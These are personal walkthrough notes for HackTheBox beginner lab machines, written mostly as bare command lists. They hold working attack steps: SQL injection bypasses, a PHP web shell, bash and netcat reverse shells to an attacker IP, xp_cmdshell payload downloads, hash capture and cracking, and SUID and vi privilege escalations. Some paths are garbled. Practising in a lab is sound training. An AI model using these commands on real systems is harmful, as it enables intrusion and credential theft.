# Learn the basics
of Penetration Testing
HackTheBox Learn the basics

10.129.21.27
telnet 10.129.21.27
root

## Fawn
HackTheBox Fawn Walkthrough
10.129.103.163

nmap -sV 10.129.103.163
nmap -sV -Pn 10.129.103.163

ftp -v 10.129.103.163
anonymous
password
get flag.txt
exit
cat flag.txt
035db21c881520061c53e0536e44f815

# Dancing
HackTheBox Dancing Walkthrough
10.129.199.43
nmap -sV 10.129.199.43
smbclient -L 10.129.199.43
smbclient //10.129.199.43/WorkShares
get James.P\flag.txt
cat 'James.P\flag.txt'
5f61c10dffbc77a704d76016a22f1664

# Redeemer
HackTheBox Redeemer Walkthrough
10.129.3.125
nmap -p- --min-rate 5000 -sV 10.129.3.125
redis-cli
redis-cli --help
redis-cli -h 10.129.3.125
info
select
select 0
keys *
get flag
03e1d2b376c37ab3f5319922053953eb

# Appointment
HackTheBox Appointment Walkthrough
10.129.152.119
What does the acronym SQL stand for?
Structured Query Language

What is one of the most common types of SQL vulnerabilities?
SQL injection

What is the 2021 OWASP Top 10 classification for SQL injection vulnerability?
A03:2021-Injection

What does Nmap report as the service and version that are running on port 80 of the target?
nmap -sV 10.129.152.119
Apache httpd 2.4.38 ((Debian))

What is the standard port used for the HTTPS protocol?
443

What is a folder called in web application terminology?
directory

What is the HTTP response code is given for ‘Not Found’ errors?
404

dir

What single character can be used to comment out the rest of a line in MySQL?
#

sqlmap -u http://10.129.152.119/ --data="username=admin&password=pass" -a
admin'#

Congratulations!

Your flag is: e3d0796d002a446c0e622226f42e9672

# Sequel
HackTheBox Sequel Walkthrough
10.129.85.234
nmap -p 3306-3306 -sV -sC 10.129.85.234
3306
MariaDB
-u
root
mysql -u root -h 10.129.85.234
*
;
show databases;
htb
use htb;
show tables;
SELECT * from config;
7b4bec00d1a39e3dd4e021ec3d915da8

#Crocodile
HackTheBox Crocodile Walkthrough
10.129.151.7
nmap -F -sV -sC 10.129.151.7
-sC
vsftpd 3.0.3
ftp anonymous@10.129.151.7
230
anonymous
get
get allowed.userlist
get allowed.userlist.passwd

cat allowed.userlist
cat allowed.userlist.passwd
admin
Apache httpd 2.4.41

gobuster dir -u http://10.129.151.7/ -w /opt/SecLists/Discovery/Web-Content/directory-list-1.0.txt

gobuster dir -u http://10.129.151.7/ -w /opt/SecLists/Discovery/Web-Contdashboard/ent/Common-PHP-Filenames.txt -x php

gobuster dir -u http://10.129.151.7/dashboard/ -w /opt/SecLists/Discovery/Web-Contdashboard/ent/Common-PHP-Filenames.txt -x php

login.php
http://10.129.151.7/login.php
admin
rKXM59ESxesUFHAd

c7110277ac44d78b6a9fff2232434d16

# Responder
HackTheBox Responder Walkthrough
10.129.162.46
curl http://10.129.162.46
unika.htb

sudo nano /etc/hosts
nmap -F -sV -sC 10.129.162.46
php
page
../../../../../../../../windows/system32/drivers/etc/hosts
//10.10.14.6/somefile
NTLM stands for New Technology LAN Manager
responder -I tun0
ip a | grep tun0
unika.htb/index.php/page=//10.10.16.75/SharedFileHTB
John The Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
badminton
nmap -Pn -sV -sC -T4 -p 5985-5985 10.129.162.46
evil-winrm -i 10.129.162.46 -u Administrator -p badminton
5985
cd C:\Users\mike\Desktop
type flag.txt
ea81b7afddd03efaa0945333ed147fac

# Three
HackTheBox Three Walkthrough
10.129.123.168
nmap -F -sV -sC 10.129.123.168
2
thetoppers.htb
/etc/hosts
10.129.123.168 thetoppers.htb

gobuster vhost -u http://thetoppers.htb/ -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

curl thetoppers.htb
curl s3.thetoppers.htb
curl http://10.129.123.168 -H "HOST: s3.thetoppers.htb"

echo -e "# htb-starting-point-tier-1-three subdomain host ip mapping\n10.129.123.168 s3.thetoppers.htb" | sudo tee -a /etc/hosts
echo -e "10.129.123.168 thetoppers.htb" | sudo tee -a /etc/hosts
sudo nano /etc/hosts

s3.thetoppers.htb
amazon s3
awscli
aws configure
test
aws --endpoint-url http://s3.thetoppers.htb/ s3 ls
aws --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
aws s3 ls
php

aws configure

echo '<?php system($_GET["cmd"]); ?>' > test.php
cat test.php

echo 'bash -i >& /dev/tcp/10.10.16.75/4321 0>&1' > revshell.sh
cat revshell.sh

aws --endpoint-url http://s3.thetoppers.htb/ s3 cp test.php s3://thetoppers.htb/test.php

aws --endpoint-url http://s3.thetoppers.htb/ s3 cp revshell.sh s3://thetoppers.htb/revshell.sh

aws s3 ls --endpoint-url http://10.129.15.129:8 s3://s3.thetopper.htb
curl http://10.129.123.168/shellme/shellid.php?cmd=type%20../../flag.txt -H "HOST: thetoppers.htb"

a980d99281a28d638ac68b9bf9453c2b

# Archetype
10.129.17.153
HackTheBox Archetype Walkthrough
nmap -F -sV -sC 10.129.17.153
1433

smbclient -U guest -L 10.129.17.153
backups

smbclient -U guest \\\\10.129.17.153\\backups
get prod.dtsConfig

cat prod.dtsConfig
M3g4c0rp123

git clone https://github.com/fortra/impacket.git
cd impacket
virtualenv --python python3 ~/impacket/impacketenv
source ~/impacket/impacketenv/bin/activate
pip3 install -r requirements.txt
python3 setup.py install

sudo find / -name "mssqlclient.py"
python3 ~/impacket/examples/mssqlclient.py Archetype/sql_svc:M3g4c0rp123@10.129.17.153 -windows-auth

xp_cmdshell whoami
SELECT is_srvrolemember('sysadmin');
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
xp_cmdshell whoami

xp_cmdshell echo %cd%
xp_cmdshell dir C:\Users\
xp_cmdshell "powershell cat C:\Users\sql_svc\Desktop\user.txt"
3e7b102e78218e935bf3f4951fec21a3
xp_cmdshell "powershell ls C:\Users\Administrator"

python -m http.server 4444
xp_cmdshell "powershell -c wget http://10.10.16.75:4444/nc64.exe -outfile C:\Users\sql_svc\Downloads"

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.75:4444/nc64.exe -outfile nc64.exe"

nc -lvnp 4444
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.75 4444"
whoami
cd ..\Desktop\
type user.txt

cp /opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe ~/archetype/
cd ~/archetype/
python -m http.server 4444
powershell -c wget http://10.10.16.75:4444/winPEASx64.exe -outfile winPEASx64.exe

powershell -c .\winPEASx64.exe

winpeas

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

xp_cmdshell type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
administrator MEGACORP_4dm1n!!

sudo find / -name "winPEASx64.exe"
python3 ~/impacket/examples/psexec.py administrator@10.129.17.153
whoami
cd C:\Users\Administrator\Desktop
type root.txt
b91ccec3305e98240082d4474b848528

cd ~/Public
curl https://github.com/int0x33/nc.exe/blob/master/nc.exe -o nc.exe
https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md
curl https://github.com/peass-ng/PEASS-ng/releases/tag/20240623-7d729c04/winPEASx64.exe -o winPEASx64.exe

python3 -m http.server
xp_cmdshell "powershell.exe wget http://10.10.16.75:8000/winPEASx64.exe -OutFile c:\\Users\Public\winPEASx64.exe"
xp_cmdshell "powershell.exe wget http://10.10.16.75:8000/nc.exe -OutFile c:\\Users\Public\nc.exe"
xp_cmdshell "powershell.exe wget https://github.com/peass-ng/PEASS-ng/releases/tag/20240623-7d729c04/winPEASx64.exe -OutFile c:\\Users\Public\winPEASx64.exe"

xp_cmdshell "powershell -c ls C:\Users\Public"

nc -lvnp 4444
xp_cmdshell "c:\Users\Public\winPEASx64.exe -e cmd.exe 10.10.16.75 4444"
xp_cmdshell "powershell -c C:\Users\Public\winPEASx64.exe"
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 10.10.16.75 4444"

# Oopsie
HackTheBox Oopsie Walkthrough
10.129.168.139
nmap -F -sV -sC 10.129.168.139

proxy
gobuster dir -u http://10.129.168.139 -w /usr/share/wordlists/dirb/common.txt

/cdn-cgi/login
http://10.129.168.139/cdn-cgi/login
gobuster dir --url http://10.129.168.139/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

cookie
34322
/uploads

cd ~/Public
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
nano test.php

$ip = '10.10.16.75';  // ip a | grep tun0
$port = 4444;

cp test.php test1.php

python3 -m http.server

nc -lvnp 4444
http://10.129.168.139/uploads/test1.php

which python3
python3 -c 'import pty; pty.spawn("/bin/bash")'

whoami
uname -a
ls -hla
ls /home
ls /home/robert -hla

cd /var/www/html/cdn-cgi/login
cat * | grep -i robert
grep -i robert *
db.php
M3g4C0rpUs3r!
su - robert
cat /home/robert/user.txt
f2c74ee8db7983851ab2a96a44eb7981

find / -group bugtracker -executable 2>/dev/null
find / -group bugtracker 2>/dev/null
find
/usr/bin/bugtracker

ls -hla /usr/bin/bugtracker
root
set owner user id

/usr/bin/bugtracker
42
cat

cd /tmp/
which bash
echo "/bin/bash" > cat
ls -hla
chmod a+x cat

export PATH=/tmp:$PATH
echo $PATH
/usr/bin/bugtracker
nano /root/root.txt
af13b0bee69f8a877c3faf667f7beacf

# Vaccine
HackTheBox Vaccine Walkthrough
cd ~/Public
10.129.145.57
nmap -F -sV -sC 10.129.145.57
ftp
anonymous
backup.zip

ftp -p anonymous@10.129.145.57
get backup.zip
unzip backup.zip
zip2john backup.zip > backup.hash
zip2john
git clone https://github.com/openwall/john
cd john/src
./configure && make
ln -s john zip2john
sudo find / -name zip2john 2>/dev/null
~/Public/john/run/zip2john ~/Public/backup.zip > ~/Public/backup.hash
nano ~/Public/backup.hash
sudo find / -name wordlists 2>/dev/null
sudo find / -name rockyou 2>/dev/null
sudo find / -name seclists 2>/dev/null

git clone https://gitlab.com/kalilinux/packages/wordlists.git
cd wordlists
gunzip rockyou.txt.gz
; cd ~/Public/ && john --wordlist='~/Public/wordlists/rockyou.txt' backup.hash

~/Public/john/run/john ~/Public/backup.hash --wordlist ~/Public/wordlists/rockyou.txt

741852963
unzip backup.zip
head index.php
https://crackstation.net/
2cb42f8734ea607eefed3b70af13bbd3  qwerty789

admin / qwerty789

http://10.129.145.57/dashboard.php?search=a

sqlmap -u 'http://10.129.145.57/dashboard.php?search=a' --cookie='PHPSESSID=aftnd3qc8ft5pjp4nmm0emljhb'
aftnd3qc8ft5pjp4nmm0emljhb
sudo sqlmap -u "http://10.129.145.57/dashboard.php?search=alpha'" --cookie="PHPSESSID=aftnd3qc8ft5pjp4nmm0emljhb" --os-shell

--os-shell

ip a | grep tun0
bash -c 'bash -i >& /dev/tcp/10.10.16.75/4444 0>&1'

nc -lvnp 4444
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
cd /var/www/html
cat dashboard.php | grep password
P@s5w0rd!
ssh postgres@10.129.145.57
sudo -l
vi

find / -type f -name user.txt 2>/dev/null
cat /var/lib/postgresql/user.txt
ec9b13ca4d6229cd5cc1e09980965bf7

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash
:shell
id
whoami
cat /root/root.txt
dd6e058e814260bc70e9bbdef2715849
